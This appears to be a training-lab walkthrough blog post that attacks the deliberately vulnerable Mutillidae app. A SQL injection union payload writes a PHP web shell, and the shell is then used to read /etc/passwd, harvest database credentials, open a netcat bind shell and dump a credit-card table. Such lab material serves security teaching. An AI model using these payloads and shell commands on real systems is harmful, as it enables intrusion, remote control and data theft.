Powered by Blogger.
Home » » OWASP Top 10 Web Hacking Final Lab 10 - SQL Injection Union Exploit #3 (Create PHP Execution Script)

OWASP Top 10 Web Hacking Final Lab 10 - SQL Injection Union Exploit #3 (Create PHP Execution Script)

Written By Akademy on Thursday, November 21, 2013 | November 21, 2013

{ SQL Injection Union Exploit #3 
(Create PHP Execution Script) }



OWASP Top 10 Web Hacking Final  Lab 10
Navigate to the User Info Page
  1. On BackTrack, Open Firefox
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. http://192.168.1.111/mutillidae
  3. Go to User Info
    • Instructions:
      1. OWASP Top 10 --> A1 - SQL Injection --> SQLi - Extract Data --> User Info

Section 9. Inject Backdoor into User Info Page
  1. Inspect the Name Textbox with Firebug
    • Instructions:
      1. Right click on the Name Textbox
      2. Click on Inspect Element
  2. Change Text Box Size
    • Instructions:
      1. After the string "size=", Change 20 to 100. (See Picture)
      2. Click on the Close Button
  3. Backdoor Union SQL Union Injection
    • Instructions:
      1. In the Name Textbox place the following string.  Remember to put a space after the "-- ".
        • ' union select null,null,null,null,'<form action="" method="post" enctype="application/x-www-form-urlencoded"><input type="text" name="CMD" size="50"><input type="submit" value="Execute Command" /></form><?php echo "<pre>";echo shell_exec($_REQUEST["CMD"]);echo "</pre>"; ?>' INTO DUMPFILE '/var/www/html/mutillidae/execute_command.php' --
      2. Click the View Account Details button
    • Note(FYI):
      1. This above SQL union statement writes a small php script into the following location /var/www/mutillidae/execute_command.php.
      2. ' union select null,null,null,null,' - This is the start of SQL union injection statement, that includes the first four fields follow by the start of the fifth field (,').
      3. <form action="" method="post" enctype="application/x-www-form-urlencoded"><input type="text" name="CMD" size="50"><input type="submit" value="Execute Command" /></form> - This is the HTML Form.  Notice that the form action calls itself, since action is assigned to nothing (form action=""). 
      4. <?php echo "<pre>";echo shell_exec($_REQUEST["CMD"]);echo "</pre>"; ?> - This is the PHP script that execute whatever is placed in the input box (<input type="text" name="CMD") via a system call (shell_exec($_REQUEST["CMD"])).
      5. ' INTO DUMPFILE ' - This tells MySQL to place the HTML Form / PHP Script into a file.
      6. /var/www/html/mutillidae/execute_command.php - This is the output file.
  4. Viewing the Results
    • Note(FYI):
      1. This is a typical error message saying either a bad user name or password was supplied.
      2. Typically, web designers should not display what caused an error.  In this case, our HTML Form is displayed. 
      3. Another practice against web design is not to display the violation that caused the error in the results field. 

Section 10. Using the Backdoor for Basic Reconnaissance
  1. Initial Reconnaissance
    • Notes (FYI):
      • Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/execute_command.php
      2. whoami; pwd
        • whoami - Print the effective username.
        • pwd - print name of current/working directory.
      3. Click the Execute Command Button
  2. Who is Logged On
    • Instructions:
      1. w
      2. Click the Execute Command Button
    • Notes (FYI):
      1. w - Show who is logged on and what they are doing.
      2. Instead of letting brutessh attempt default usernames, now you can direct a potential attack at the student user.
  3. Exploring /etc/passwd
    • Instructions:
      1. cat /etc/passwd
      2. Click the Execute Command Button
    • Notes (FYI):
      1. /etc/passwd file stores essential information, which is required during login.  The /etc/passwd file contains the following fields:  Username, Password Existance, User ID, Group ID, Gecos, Home Directory, and Shell.
      2. Notice that mail, ftp, apache, ssh and mysql are all located in the /etc/passwd file.
  4. Network Reconnaissance
    • Instructions:
      1. netstat -nao | grep "0.0.0.0:"
      2. Click the Execute Command Button
    • Notes (FYI):
      1. 3306 - MySQL
      2. 22 - SSH
      3. 25 - SMTP (Mail)
      4. 631 - Internet Print Protocol

Section 11. Using the Backdoor for Database Reconnaissance
  1. Database Reconnaissance
    • Instructions:
      1. find * -name "*.php" | xargs grep -i "password" | grep "="
      2. Click the Execute Command Button
    • Notes (FYI):
      1. Find all files that end with a .php that contains the string password AND the string =.
  2. Display PHP Script File
    • Instructions:
      1. cat classes/MySQLHandler.php | grep -v "<?php"
      2. Click the Execute Command Button
    • Notes (FYI):
      1. In order to display a PHP script as a text file, you must remove the starting "<?php" tag.  If you do not remove the tag, then the web server will try to run the script instead of displaying the contents.
  3. View Database Authentication Attributes
    • Notes(FYI):
      1. Username: root
      2. Password: samurai
      3. Database Name: nowasp

Section 12. Using the Backdoor for Netcat Reconnaissance
  1. Netcat Reconnaissance
    • Instructions:
      1. which nc; netstat -nao | grep 4444 | wc -l
      2. Click the Execute Command Button
    • Notes (FYI):
      1. which nc, Where netcat located.
      2. netstat -nao | grep 4444 | wc -l,  show all network connections for port 4444, and count them.
      3. Note, you can run netcat on any port that is not being used.
  2. Execute Netcat
    • Instructions:
      1. mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
      2. Click the Execute Command Button
    • Notes (FYI):
      1. Make a FIFO named pipe.  A FIFO special file (a named pipe) is similar to a pipe, except that it is accessed as part of the file system. It can be opened by multiple processes for reading or writing. When processes are exchanging data via the FIFO, the kernel passes all data internally without writing it to the file system. Thus, the FIFO special file has no contents on the file system, the file system entry merely serves as a reference point so that processes can access the pipe using a name in the file system.
      2. Pipes allow separate processes to communicate without having been designed explicitly to work together.
      3. This will allow two processes to connect to netcat.
      4. nc -l 4444, tells netcat to listen and allow connections on port 4444.
  3. On BackTrack, Start up a "another" terminal window
    • Instructions:
      1. Click on the Terminal Window
  4. Connect to Netcat
    • Notes(FYI):
      • Implement the following instructions on the BackTrack VM
      • Replace 192.168.1.111 with the Fedora(Mutillidae) IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. nc 192.168.1.111 4444
        • Use BackTrack to Connect to the Mutillidae Netcat session on port 4444
      2. hostname
        • This is server hostname that hosts Mutillidae.
      3. whoami
        • Print the effective UserID.
        • Ie., Who am I connected as.
  5. View Credit Card Information
    • Notes(FYI):
      • This step could have also been completed from the Command Execution PHP script.
      • You do not need netcat for this step.
    • Instructions:
      1. echo "show databases;" | mysql -uroot -psamurai
      2. echo "use nowasp; show tables;" | mysql -uroot -psamurai
      3. echo "select * from nowasp.credit_cards;" | mysql -uroot -psamurai

Section 13. Proof of Lab
  1. Proof of Lab : Hãy quay lại toàn bộ tiến trình thực hiện


 
Share this article :

0 comments:

Post a Comment

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. Security365 - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT